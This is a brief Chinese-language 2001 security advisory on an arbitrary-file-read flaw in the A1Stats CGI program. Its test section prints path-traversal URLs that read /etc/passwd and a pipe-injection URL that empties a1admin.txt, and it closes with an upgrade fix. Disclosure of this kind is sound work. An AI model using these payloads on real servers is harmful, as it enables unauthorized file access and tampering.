A1Stats CGI程序存在任意文件可查看漏洞发布时间:2001-05-09 更新时间:2001-04-09 严重程度:高 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 A1Stats (http://www.gadnet.com/a1stats)详细描述 A1Stats (http://www.gadnet.com/a1stats)是一个CGI程序,用来 跟踪网站流量通信,其中对输入合法性缺少正确的检查可以导致任意 文件的查看。 测试代码 www.server.com/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd www.server.com/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd http://localhost/cgi-bin/a1stats/a1disp.cgi?|echo%20>a1admin.txt| 可以清空a1admin.txt的内容。 解决方案 下载最新的版本: http://www.gadnet.com/a1stats 相关信息 [ by nemesystm of the DHC ] [ (http://dhcorp.cjb.net - neme-dhc@hushmail.com) ] |
